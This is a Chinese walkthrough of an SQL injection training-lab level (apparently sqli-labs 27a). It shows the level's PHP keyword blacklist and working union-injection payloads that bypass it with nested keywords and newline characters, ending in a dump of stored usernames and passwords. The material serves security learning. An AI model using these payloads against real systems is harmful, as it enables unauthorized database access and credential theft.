5.27a.第27a关 get联合注入 过滤select和union "闭合
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out Select
return $id;
}
(1)判断注入类型、注入点
?id=1' 返回id=1数据
?id=1" 报错,判断为字符型注入,"闭合
?id=1"or"0 返回id=1数据
?id=2"or"0 返回id=2数据,确定为"闭合
(2)查询数据库名
?id=0"uniunionon%0AseleSelectct%0A7,8,9%0Aand"1id=0"这是注入的起始点。id=0是一个无效的ID值(可能用于触发错误或确保原查询不返回数据)。双引号"用于闭合原始查询中的字符串。
uniunionon这是union关键词的绕过变体
%0A(换行符)用于替代空格,绕过对空格的过滤
seleSelectct类似uniunionon,这是select关键词的绕过变体
and"1"可能被解释为一个字符串或布尔值(真),帮助闭合前面的字符串并使查询有效?id=0"uniunionon%0AseleSelectct%0A7,database(),9%0Aand"1
(3)查询表名
?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'%0Aand"1
(4)查询字段名
?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand"1
(5)查询账号密码
?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(id,0x7e,username,0x3a,password)from%0Ausers%0Awhere%0Aid=3%0Aand"1
